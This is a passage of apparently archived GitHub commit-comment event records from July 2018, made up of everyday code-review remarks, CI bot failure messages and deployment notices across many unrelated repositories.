yet."}},"created_at":"2018-07-17T22:15:30Z"}
{"id":"7979557196","type":"CommitCommentEvent","actor":{"login":"pauldotknopf"},"repo":{"name":"pauldotknopf/net-core-qml"},"payload":{"comment":{"id":29741573,"position":48,"line":48,"path":"src/net/Qt.NetCore.Tests/NetInstanceInteropTests.cs","commit_id":"af730927532e17b676fcad7a97048f7e72a76ac8","created_at":"2018-07-17T22:16:08Z","updated_at":"2018-07-17T22:16:08Z","author_association":"OWNER","body":"You'll want to do ```GC.Collect(GC.MaxGeneration)``` to ensure everything is garbage collected."}},"created_at":"2018-07-17T22:16:08Z"}
{"id":"7979559537","type":"CommitCommentEvent","actor":{"login":"jimjibone"},"repo":{"name":"naggie/sd01"},"payload":{"comment":{"id":29741577,"position":null,"line":null,"path":null,"commit_id":"77b7ec831dfbf79de2c1325bca738adb3669ccbb","created_at":"2018-07-17T22:16:46Z","updated_at":"2018-07-17T22:16:46Z","author_association":"COLLABORATOR","body":"Cheers. I think this is fine. AFAIK this is probably the best way to do it. Don't think I have come across any idiomatic approach to this. I don't think we need to worry about race conditions either, as long as we warn the developer through documentation"}},"created_at":"2018-07-17T22:16:46Z"}
{"id":"7979562722","type":"CommitCommentEvent","actor":{"login":"pengwynn"},"repo":{"name":"adamyonk/dotfiles"},"payload":{"comment":{"id":29741582,"position":null,"line":null,"path":null,"commit_id":"ab4f80dc6cd8921a4c044502eb67e57439141650","created_at":"2018-07-17T22:17:40Z","updated_at":"2018-07-17T22:17:40Z","author_association":"CONTRIBUTOR","body":"🎉 "}},"created_at":"2018-07-17T22:17:40Z"}
{"id":"7979562948","type":"CommitCommentEvent","actor":{"login":"ivanslf"},"repo":{"name":"isaacs/nave"},"payload":{"comment":{"id":29741586,"position":92,"line":84,"path":"README.md","commit_id":"294ad6f0c80c89bb0ca0e62e1b129405f297cad9","created_at":"2018-07-17T22:17:43Z","updated_at":"2018-07-17T22:17:43Z","author_association":"NONE","body":"`n` is a recursive bacronymic abbreviation for \"n is not using subshells\""}},"created_at":"2018-07-17T22:17:43Z"}
{"id":"7979564322","type":"CommitCommentEvent","actor":{"login":"rolivo"},"repo":{"name":"KhronosGroup/WebGL"},"payload":{"comment":{"id":29741587,"position":null,"line":null,"path":null,"commit_id":"6a1722fa0ed15b52563da09989115c729dca21c9","created_at":"2018-07-17T22:18:09Z","updated_at":"2018-07-17T22:18:09Z","author_association":"NONE","body":"How many more restrictions will you add to this api ?, that's why nobody takes them seriously, I prefer to develop on a native platform, a hundred thousand restrictions, a garbage, a real garbage."}},"created_at":"2018-07-17T22:18:09Z"}
{"id":"7979566344","type":"CommitCommentEvent","actor":{"login":"strcpy00"},"repo":{"name":"rapid7/metasploit-framework"},"payload":{"comment":{"id":29741591,"position":null,"line":null,"path":null,"commit_id":"7da1900dfc5e794a307eb5bda1f6a59d782a4e9c","created_at":"2018-07-17T22:18:42Z","updated_at":"2018-07-17T22:18:42Z","author_association":"NONE","body":"hi boss.\r\nReverse UDP exception, The generated payload execution will crash, including psh-cmd, exe, will it be a shellcode error?\r\nCan you solve the error? Otherwise, you can't get the meterpreter window and you can't deliver the payload."}},"created_at":"2018-07-17T22:18:42Z"}
{"id":"7979566810","type":"CommitCommentEvent","actor":{"login":"ercu"},"repo":{"name":"Hede-io/hede.io"},"payload":{"comment":{"id":29741592,"position":null,"line":null,"path":null,"commit_id":"5beb2cda71bc01175ca11a2caa5c23561237defd","created_at":"2018-07-17T22:18:50Z","updated_at":"2018-07-17T22:18:50Z","author_association":"COLLABORATOR","body":"While using html5 history pushState, react was not re-rendering. As it was not allowed by React to access its history from vanilla javascript, I had to add history object to global window object and call it on local url clicks. I need to check GC."}},"created_at":"2018-07-17T22:18:50Z"}
{"id":"7979569034","type":"CommitCommentEvent","actor":{"login":"ProgHaj"},"repo":{"name":"maakep/cgj2018"},"payload":{"comment":{"id":29741597,"position":null,"line":null,"path":null,"commit_id":"4a998da524573c0a2a68a9aadbb99418503caf2d","created_at":"2018-07-17T22:19:27Z","updated_at":"2018-07-17T22:19:27Z","author_association":"COLLABORATOR","body":"Nah not really, used it since I didn't like that we had a cooldown from the start of the game, which only  really affects us in the lobby. Could have put the LastAttak = -Cooldown in the constructor instead. "}},"created_at":"2018-07-17T22:19:27Z"}
{"id":"7979579512","type":"CommitCommentEvent","actor":{"login":"stalker314314"},"repo":{"name":"matiasdelellis/facerecognition"},"payload":{"comment":{"id":29741621,"position":6,"line":14,"path":"Makefile","commit_id":"2d2603f97ef1163ce05e96d3d5fb3dd5e16359a6","created_at":"2018-07-17T22:22:25Z","updated_at":"2018-07-17T22:22:25Z","author_association":"NONE","body":"`wget ... -O js/handlebars.js` and you don't need that `mv`:)"}},"created_at":"2018-07-17T22:22:25Z"}
{"id":"7979581749","type":"CommitCommentEvent","actor":{"login":"ProgHaj"},"repo":{"name":"maakep/cgj2018"},"payload":{"comment":{"id":29741625,"position":null,"line":null,"path":null,"commit_id":"c89c406bf1770cd602605f8434afcc1ca234dd19","created_at":"2018-07-17T22:23:02Z","updated_at":"2018-07-17T22:23:02Z","author_association":"COLLABORATOR","body":"Thanks! Is it still possible to get the commit that gets rebased if we decide to change how we want to do? (since the commented code works but is just another solution.)"}},"created_at":"2018-07-17T22:23:02Z"}
{"id":"7979582132","type":"CommitCommentEvent","actor":{"login":"OtherworldBob"},"repo":{"name":"OtherworldBob/ManiacEditor"},"payload":{"comment":{"id":29741626,"position":null,"line":null,"path":null,"commit_id":"55cf760faa5cbd861d3c9439b7bfebec45c1c091","created_at":"2018-07-17T22:23:08Z","updated_at":"2018-07-17T22:23:08Z","author_association":"OWNER","body":"As well as the filthy hacks I've added, many thanks to @Axanery for providing the updated objects_attributes.ini file here, which lets us view and edit the new Plus objects/properties with ease."}},"created_at":"2018-07-17T22:23:08Z"}
{"id":"7979583765","type":"CommitCommentEvent","actor":{"login":"wvu-r7"},"repo":{"name":"rapid7/metasploit-framework"},"payload":{"comment":{"id":29741628,"position":null,"line":null,"path":null,"commit_id":"7da1900dfc5e794a307eb5bda1f6a59d782a4e9c","created_at":"2018-07-17T22:23:36Z","updated_at":"2018-07-17T22:23:36Z","author_association":"CONTRIBUTOR","body":"Hi, please file a bug report here: https://github.com/rapid7/metasploit-framework/issues/new. This is just a merge commit."}},"created_at":"2018-07-17T22:23:36Z"}
{"id":"7979584454","type":"CommitCommentEvent","actor":{"login":"stalker314314"},"repo":{"name":"matiasdelellis/facerecognition"},"payload":{"comment":{"id":29741631,"position":4,"line":4,"path":"appinfo/routes.php","commit_id":"2d2603f97ef1163ce05e96d3d5fb3dd5e16359a6","created_at":"2018-07-17T22:23:47Z","updated_at":"2018-07-17T22:23:47Z","author_association":"NONE","body":"people do not close php scripts with `?>` these days? Seems I missed a lot since 2000s:D"}},"created_at":"2018-07-17T22:23:47Z"}
{"id":"7979585432","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29741634,"position":null,"line":null,"path":null,"commit_id":"51a388694b597dc9af0a6fdaa9949f117f149bb1","created_at":"2018-07-17T22:24:02Z","updated_at":"2018-07-17T22:24:02Z","author_association":"NONE","body":"159013173_Issue#6243 (Nigusse) - x86_64-MacOS-10.9-clang: OK (2934 of 2943 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 9 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 9 tests had: Table big diffs.\n * 1 test had: MTR small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 614\n * Failed: 9\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51a388694b597dc9af0a6fdaa9949f117f149bb1-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51a388694b597dc9af0a6fdaa9949f117f149bb1-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.69%25-yellow.png)</a> \n"}},"created_at":"2018-07-17T22:24:02Z"}
{"id":"7979585671","type":"CommitCommentEvent","actor":{"login":"sblack-usu"},"repo":{"name":"hydroshare/hydroshare"},"payload":{"comment":{"id":29741636,"position":null,"line":null,"path":null,"commit_id":"074f93cd8c698a1b176bf1f80ecc81b18e68f1db","created_at":"2018-07-17T22:24:06Z","updated_at":"2018-07-17T22:24:06Z","author_association":"CONTRIBUTOR","body":"zip also has a command to list files in a zip.  we could use that to get the list of files to be added.\r\n\r\n--show-files"}},"created_at":"2018-07-17T22:24:06Z"}
{"id":"7979585765","type":"CommitCommentEvent","actor":{"login":"appdevman"},"repo":{"name":"appdevman/Training"},"payload":{"comment":{"id":29741638,"position":null,"line":null,"path":null,"commit_id":"37ab8ddeb4c983171a0ce9889b95fbb3b63d3ffe","created_at":"2018-07-17T22:24:08Z","updated_at":"2018-07-17T22:24:08Z","author_association":"OWNER","body":"x"}},"created_at":"2018-07-17T22:24:08Z"}
{"id":"7979585900","type":"CommitCommentEvent","actor":{"login":"MartinRWolfe"},"repo":{"name":"prusa3d/Original-Prusa-i3"},"payload":{"comment":{"id":29741639,"position":null,"line":null,"path":null,"commit_id":"ad994c49ac9211c01122046ce410f98257c35ddf","created_at":"2018-07-17T22:24:10Z","updated_at":"2018-07-17T22:24:10Z","author_association":"NONE","body":"Could you add the SCad files please so those of us that have fitted Volcano blocks will be able to modify the cooling update to suit.\r\n\r\nRegards,\r\nMartin"}},"created_at":"2018-07-17T22:24:10Z"}
{"id":"7979604528","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29741689,"position":333,"line":284,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-17T22:29:28Z","updated_at":"2018-07-17T22:29:28Z","author_association":"NONE","body":"I think `require(getCommittedMoveHash(plaintextMoveInviter, password) == id);` will be more readable."}},"created_at":"2018-07-17T22:29:28Z"}
{"id":"7979604976","type":"CommitCommentEvent","actor":{"login":"Joedang"},"repo":{"name":"psas/lv3.0-airframe"},"payload":{"comment":{"id":29741692,"position":null,"line":null,"path":null,"commit_id":"8bcf5d5671cca7807d8a9bdc5e0651303f3aec32","created_at":"2018-07-17T22:29:36Z","updated_at":"2018-07-17T22:29:36Z","author_association":"MEMBER","body":"So, a few style gripes...\r\n\r\n~~The correct way to move files in a git repo is with `git mv <old pathname> <new pathname>`. If you just move the files  and do `git add -A`, Git sees it as deleting a bunch of files and creating a bunch of files, which is hopefully terrible for obvious reasons.~~ Just kidding, I got confused by only looking at the diff between commits. \r\n\r\n[There's a repo for work on LV3.1 here](https://github.com/psas/lv3.1-airframe). New CAD work should go there. We could totally set the LV3.0 repo up to be \"LV3\", rather than specifically \"LV3.0\". But, the correct way to do that would be to make a branch/tag for LV3.0 and *modify/replace* the existing files for LV3.1 work, rather than just sweeping the old stuff into another directory. I was thinking it would make more sense to start a new repo, since most of the CAD will change. However, it's a fair point that the documentation, simulations, and data will all still be based on LV3.0...\r\n\r\nPlease avoid putting spaces in file names. Doing so can make it difficult to manipulate them through scripts. \r\n\r\nAlso, please remember to set your username and email. As is, I have no idea who committed these changes. I'm assuming it was @Flynnn or @RocketmanYG. If you're not on your normal machine (say, the EPL desktop), you can use the `--author` option in `git commit` to set your identity for a single commit. \r\n\r\nSorry, I'm not trying to call whoever you are out. I just got a little triggered, lol."}},"created_at":"2018-07-17T22:29:36Z"}
{"id":"7979606323","type":"CommitCommentEvent","actor":{"login":"stalker314314"},"repo":{"name":"matiasdelellis/facerecognition"},"payload":{"comment":{"id":29741694,"position":4,"line":2,"path":"appinfo/routes.php","commit_id":"942d8ef97e9453bbb1e27547c5d5da18b6de8ce3","created_at":"2018-07-17T22:30:00Z","updated_at":"2018-07-17T22:30:00Z","author_association":"NONE","body":"watch out here, there is subtle distinction between \"faces\" and \"persons\". \"Faces\" are cropped images of...faces:) \"Persons\" are identified faces. So... maybe `'/faces/{fileId}'` should stay like this, but `'/face/{id}'` should be `'/person/{id}'`. I still don't grasp fully your code, so pardon my ignorance and feel free to skip this comment:D"}},"created_at":"2018-07-17T22:30:00Z"}
{"id":"7979606711","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"poanetwork/poa-explorer"},"payload":{"comment":{"id":29741696,"position":22,"line":2667,"path":"apps/explorer/lib/explorer/chain.ex","commit_id":"4c94dd290ab5247224b0d81bece561eabe7c159f","created_at":"2018-07-17T22:30:07Z","updated_at":"2018-07-17T22:30:07Z","author_association":"NONE","body":"Just a note: the Ecto.Query struct fields are private. For example, the `from` representation you are accessing is going to be different in Ecto 3.0. I would recommend finding a way to express this without looking inside the query."}},"created_at":"2018-07-17T22:30:07Z"}
{"id":"7979608690","type":"CommitCommentEvent","actor":{"login":"ProgHaj"},"repo":{"name":"maakep/cgj2018"},"payload":{"comment":{"id":29741705,"position":null,"line":null,"path":null,"commit_id":"d938c5b7140f64075f80f78eeca74f10f15522ef","created_at":"2018-07-17T22:30:37Z","updated_at":"2018-07-17T22:30:37Z","author_association":"COLLABORATOR","body":"Whoops, thanks for pointing that out. I thought Unity handled the caching by its own after first use.\r\n\r\nHmm, was thinking of adding the full name (Discrete Fourier Transform), will do in the future. Since I mostly use a small screen short names are so much easier to read, especially if I use vim on the side. But will try to be better with the naming convention. "}},"created_at":"2018-07-17T22:30:37Z"}
{"id":"7979608731","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"glandium/git-cinnabar"},"payload":{"comment":{"id":29741706,"position":null,"line":null,"path":null,"commit_id":"16da9d37ae19ab0633f1b92000737c295a4f0dce","created_at":"2018-07-17T22:30:38Z","updated_at":"2018-07-17T22:30:38Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nSyntaxError at template.tasks[0][\"decision_id\"]: unexpected EOF for 'event.ref[:10] == \"refs/tags/' at '\"refs/tags/'\n\n</details>"}},"created_at":"2018-07-17T22:30:38Z"}
{"id":"7979612167","type":"CommitCommentEvent","actor":{"login":"jeroen"},"repo":{"name":"RcppCore/RcppParallel"},"payload":{"comment":{"id":29741711,"position":null,"line":null,"path":null,"commit_id":"d8fa4f1cd99da1f1434988defc20c6bc089a1d48","created_at":"2018-07-17T22:31:38Z","updated_at":"2018-07-17T22:31:38Z","author_association":"CONTRIBUTOR","body":"Actually I don't think this should be necessary. `make` should automatically expand the paths by itself if needed when invoking external commands."}},"created_at":"2018-07-17T22:31:38Z"}
{"id":"7979612921","type":"CommitCommentEvent","actor":{"login":"rodolfohcoGIT2"},"repo":{"name":"Rodolfohco/lab02"},"payload":{"comment":{"id":29741714,"position":null,"line":null,"path":null,"commit_id":"0032262a5998ebee3ad2df3c3e2c49f5adee0526","created_at":"2018-07-17T22:31:52Z","updated_at":"2018-07-17T22:31:52Z","author_association":"NONE","body":"Ajustar Paragrafor Contato para Contato do Site"}},"created_at":"2018-07-17T22:31:52Z"}
{"id":"7979613509","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29741716,"position":397,"line":313,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-17T22:32:02Z","updated_at":"2018-07-17T22:32:02Z","author_association":"NONE","body":"`moneyLeftAfterContract` here and `amountForWinner` below are the same. Move it before the `if` then you have a flatter if structure:\r\n\r\n```solidity\r\nif (outcome == Outcome.Tie) {\r\n} else if (outcome == Outcome.inviterWins) {\r\n} else {\r\n}\r\n```"}},"created_at":"2018-07-17T22:32:02Z"}
{"id":"7979615009","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29741723,"position":null,"line":null,"path":null,"commit_id":"d1795c1fec12218c0ecdd4e4e029e7f1fb80a630","created_at":"2018-07-17T22:32:28Z","updated_at":"2018-07-17T22:32:28Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-53](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-53).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-53-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-17T22:32:28Z"}
{"id":"7979615217","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29741724,"position":433,"line":338,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-17T22:32:32Z","updated_at":"2018-07-17T22:32:32Z","author_association":"NONE","body":"Make it public and confirm it works as expected in a unit test."}},"created_at":"2018-07-17T22:32:32Z"}
{"id":"7979617149","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"glandium/git-cinnabar"},"payload":{"comment":{"id":29741734,"position":null,"line":null,"path":null,"commit_id":"8d8cff4128401c058ff5f1ea019cc90bea42e827","created_at":"2018-07-17T22:33:04Z","updated_at":"2018-07-17T22:33:04Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/queue/v1/create-task-request.json#\nErrors:\n  * data should NOT have additional properties: \"taskId\"\n\n---\n\n* method:     createTask\n* errorCode:  InputValidationError\n* statusCode: 400\n* time:       2018-07-17T22:33:04.462Z\n\n</details>"}},"created_at":"2018-07-17T22:33:04Z"}
{"id":"7979618345","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29741735,"position":null,"line":null,"path":null,"commit_id":"4b022e3ae1e8f4879222d5f1b574f80dc4ca88a6","created_at":"2018-07-17T22:33:25Z","updated_at":"2018-07-17T22:33:25Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-226](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-226).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-226-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-17T22:33:25Z"}
{"id":"7979620466","type":"CommitCommentEvent","actor":{"login":"stalker314314"},"repo":{"name":"matiasdelellis/facerecognition"},"payload":{"comment":{"id":29741738,"position":3,"line":3,"path":"lib/Command/Update.php","commit_id":"942d8ef97e9453bbb1e27547c5d5da18b6de8ce3","created_at":"2018-07-17T22:34:06Z","updated_at":"2018-07-17T22:34:06Z","author_association":"NONE","body":"remove him?"}},"created_at":"2018-07-17T22:34:06Z"}
{"id":"7979621078","type":"CommitCommentEvent","actor":{"login":"sarahdwyer"},"repo":{"name":"naranjja/dialogflow-fulfillment-nodejs"},"payload":{"comment":{"id":29741739,"position":null,"line":null,"path":null,"commit_id":"57302849b17325890e83108472247f1267b4a80a","created_at":"2018-07-17T22:34:17Z","updated_at":"2018-07-17T22:34:17Z","author_association":"NONE","body":"Submit a pull request please!"}},"created_at":"2018-07-17T22:34:17Z"}
{"id":"7979624075","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"glandium/git-cinnabar"},"payload":{"comment":{"id":29741744,"position":null,"line":null,"path":null,"commit_id":"fa67ecb4759fee338bac15375d055ad30eb0a466","created_at":"2018-07-17T22:35:12Z","updated_at":"2018-07-17T22:35:12Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nThe taskId is absent.\n\n</details>"}},"created_at":"2018-07-17T22:35:12Z"}
{"id":"7979627555","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29741747,"position":515,"line":415,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-17T22:36:16Z","updated_at":"2018-07-17T22:36:16Z","author_association":"NONE","body":"Instead of `msg.sender` you could add an `address` argument for maximum versatility."}},"created_at":"2018-07-17T22:36:16Z"}
{"id":"7979628842","type":"CommitCommentEvent","actor":{"login":"smilejwb"},"repo":{"name":"smilejwb/TIL"},"payload":{"comment":{"id":29741749,"position":5,"line":12,"path":"README.md","commit_id":"12ee1f58d47bb0c8c8de5c88ead987cee8d581b8","created_at":"2018-07-17T22:36:38Z","updated_at":"2018-07-17T22:36:38Z","author_association":"OWNER","body":"start 1"}},"created_at":"2018-07-17T22:36:38Z"}
{"id":"7979630655","type":"CommitCommentEvent","actor":{"login":"Freyja-Folkvangr"},"repo":{"name":"entel-garage/node-red-bluemix-starter-1"},"payload":{"comment":{"id":29741750,"position":null,"line":null,"path":null,"commit_id":"88477712d9329a28a48b5edafa87c93729e95307","created_at":"2018-07-17T22:37:13Z","updated_at":"2018-07-17T22:37:13Z","author_association":"MEMBER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/50a571c6-a3ad-4e2d-bb01-07256d1803b1?env_id=ibm%3Ayp%3Aus-south \"observatorio\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/e6226823-269c-48e4-be2a-79dfc959087e?env_id=ibm%3Ayp%3Aus-south \"observatorio\") deployed [node-red-bluemix-starter-1](https://github.com/entel-garage/node-red-bluemix-starter-1/releases/tag/deploy-ibm-yp-us-south-ENTEL-Corp-observatorio-20180717-223712 \"deploy-ibm-yp-us-south-ENTEL-Corp-observatorio-20180717-223712\") to [observatorio](https://console.bluemix.net/apps/dc2f1187-a453-42f3-93bb-d8a04718096f?env_id=ibm:yp:us-south \"ibm:yp:us-south:ENTEL Corp:observatorio\"), including this commit"}},"created_at":"2018-07-17T22:37:13Z"}
{"id":"7979631037","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29741753,"position":547,"line":440,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-17T22:37:20Z","updated_at":"2018-07-17T22:37:20Z","author_association":"NONE","body":"Ahaha! Talk about a truck-size hole! For testing right?"}},"created_at":"2018-07-17T22:37:20Z"}
{"id":"7979631041","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"glandium/git-cinnabar"},"payload":{"comment":{"id":29741754,"position":null,"line":null,"path":null,"commit_id":"6c6dff9bcf62cfe170fa56c83f1be0a406a67fce","created_at":"2018-07-17T22:37:21Z","updated_at":"2018-07-17T22:37:21Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/queue/v1/create-task-request.json#\nErrors:\n  * data should NOT have additional properties: \"taskId\"\n\n---\n\n* method:     createTask\n* errorCode:  InputValidationError\n* statusCode: 400\n* time:       2018-07-17T22:37:20.971Z\n\n</details>"}},"created_at":"2018-07-17T22:37:21Z"}
{"id":"7979631412","type":"CommitCommentEvent","actor":{"login":"Freyja-Folkvangr"},"repo":{"name":"entel-garage/node-red-bluemix-starter-1"},"payload":{"comment":{"id":29741756,"position":null,"line":null,"path":null,"commit_id":"88477712d9329a28a48b5edafa87c93729e95307","created_at":"2018-07-17T22:37:27Z","updated_at":"2018-07-17T22:37:27Z","author_association":"MEMBER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/7ffc64ce-53b8-457e-89e9-17e950cd29c7?env_id=ibm%3Ayp%3Aus-south \"testgiuliano\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/5091715e-8af8-4f22-9005-465986e9de1a?env_id=ibm%3Ayp%3Aus-south \"testgiuliano\") deployed [node-red-bluemix-starter-1](https://github.com/entel-garage/node-red-bluemix-starter-1/releases/tag/deploy-ibm-yp-us-south-ENTEL-Corp-giuliano-20180717-223726 \"deploy-ibm-yp-us-south-ENTEL-Corp-giuliano-20180717-223726\") to [giuliano](https://console.bluemix.net/apps/6b1160bc-4b3d-4fe2-8504-73f41f30d869?env_id=ibm:yp:us-south \"ibm:yp:us-south:ENTEL Corp:giuliano\"), including this commit"}},"created_at":"2018-07-17T22:37:27Z"}
{"id":"7979631965","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"poanetwork/poa-explorer"},"payload":{"comment":{"id":29741761,"position":46,"line":1515,"path":"apps/explorer/lib/explorer/chain.ex","commit_id":"7166ce42162b1f9eddd6fa4e1a282420acce2e8a","created_at":"2018-07-17T22:37:37Z","updated_at":"2018-07-17T22:37:37Z","author_association":"NONE","body":"You may be able to use schemaless queries here:\r\n\r\n    from pg in \"pg_class\", where: pg.relname == \"transactions\", select: pg.reltuples\r\n\r\nAlthough the `::BIGINT` may require a fragment. 🤔 "}},"created_at":"2018-07-17T22:37:37Z"}
{"id":"7979632804","type":"CommitCommentEvent","actor":{"login":"joewiz"},"repo":{"name":"eXist-db/exist-xqts-runner"},"payload":{"comment":{"id":29741763,"position":null,"line":null,"path":null,"commit_id":"9efb187c343bbff9fac67e49d59b717299a0c45e","created_at":"2018-07-17T22:37:52Z","updated_at":"2018-07-17T22:37:52Z","author_association":"MEMBER","body":"@adamretter These diagrams look really valuable for helping developers understand how the utility works.  Thanks!"}},"created_at":"2018-07-17T22:37:52Z"}
{"id":"7979633820","type":"CommitCommentEvent","actor":{"login":"tagliala"},"repo":{"name":"DavyJonesLocker/client_side_validations"},"payload":{"comment":{"id":29741764,"position":null,"line":null,"path":null,"commit_id":"35501c1b120a3d0d5b8a907e4edd6d7b826378e6","created_at":"2018-07-17T22:38:08Z","updated_at":"2018-07-17T22:38:08Z","author_association":"CONTRIBUTOR","body":"Hi. @dinatih please start a new issue, I should update this part of the wiki: https://github.com/DavyJonesLocker/client_side_validations/wiki/Custom-Validators#remote-validators"}},"created_at":"2018-07-17T22:38:08Z"}
{"id":"7979634221","type":"CommitCommentEvent","actor":{"login":"s-zanella"},"repo":{"name":"project-everest/hacl-star"},"payload":{"comment":{"id":29741767,"position":null,"line":null,"path":null,"commit_id":"79de0e9a9a0da076275d041e8b8800e1b69f756f","created_at":"2018-07-17T22:38:15Z","updated_at":"2018-07-17T22:38:15Z","author_association":"CONTRIBUTOR","body":"I think `--expose_interfaces` is unavoidable internally in `Lib`. A complete implementation of `Lib.Buffer` on top of `LowStar.Buffer` or `FStar.Buffer` needs to be verified exposing `Lib.Sequence.fst` (the implementation in the `dev` branch is only a stub).\r\nI agree it is possible to avoid exposing `Lib.Sequence.fst` to users of `Lib` at the cost of implementing and verifying everything needed inside of `Lib`. I'm not yet sure that what you gain is a good trade off: isolation to changes (and improvements!) in F* and a smaller proof context.\r\n\r\nYou may want to remove `--expose_interfaces` here https://github.com/project-everest/hacl-star/edit/dev/specs/Makefile#L5 if it's not needed for verification."}},"created_at":"2018-07-17T22:38:15Z"}
{"id":"7979634729","type":"CommitCommentEvent","actor":{"login":"shadowwalkersb"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29741769,"position":4,"line":37,"path":"libpyEM/libpyTypeConverter2.cpp","commit_id":"a6519991c11b9fb2ae30229fcdc4fba9aededdb0","created_at":"2018-07-17T22:38:24Z","updated_at":"2018-07-17T22:38:24Z","author_association":"MEMBER","body":"Is this include necessary?"}},"created_at":"2018-07-17T22:38:24Z"}
{"id":"7979635715","type":"CommitCommentEvent","actor":{"login":"Philius"},"repo":{"name":"espressif/arduino-esp32"},"payload":{"comment":{"id":29741771,"position":null,"line":null,"path":null,"commit_id":"12ca9e8b521127c5455b8e45b463371cc0cc6d3d","created_at":"2018-07-17T22:38:41Z","updated_at":"2018-07-17T22:38:41Z","author_association":"NONE","body":"If your code is running on the same processor as the wifi then you have to yield regularly otherwise the wifi stuff will get messed up.\r\nI know adc2 is being used by the wifi, does your code work with bluetooth or without wifi?"}},"created_at":"2018-07-17T22:38:41Z"}
{"id":"7979635847","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"glandium/git-cinnabar"},"payload":{"comment":{"id":29741772,"position":null,"line":null,"path":null,"commit_id":"fefb49622f29b19cfa6b305c2194f6f47e319fb4","created_at":"2018-07-17T22:38:43Z","updated_at":"2018-07-17T22:38:43Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/queue/v1/create-task-request.json#\nErrors:\n  * data should NOT have additional properties: \"taskId\"\n\n---\n\n* method:     createTask\n* errorCode:  InputValidationError\n* statusCode: 400\n* time:       2018-07-17T22:38:43.710Z\n\n</details>"}},"created_at":"2018-07-17T22:38:43Z"}
{"id":"7979637606","type":"CommitCommentEvent","actor":{"login":"shadowwalkersb"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29741779,"position":5,"line":38,"path":"libpyEM/libpyTypeConverter2.cpp","commit_id":"a6519991c11b9fb2ae30229fcdc4fba9aededdb0","created_at":"2018-07-17T22:39:13Z","updated_at":"2018-07-17T22:39:13Z","author_association":"MEMBER","body":"How about this include, is it necessary?"}},"created_at":"2018-07-17T22:39:13Z"}
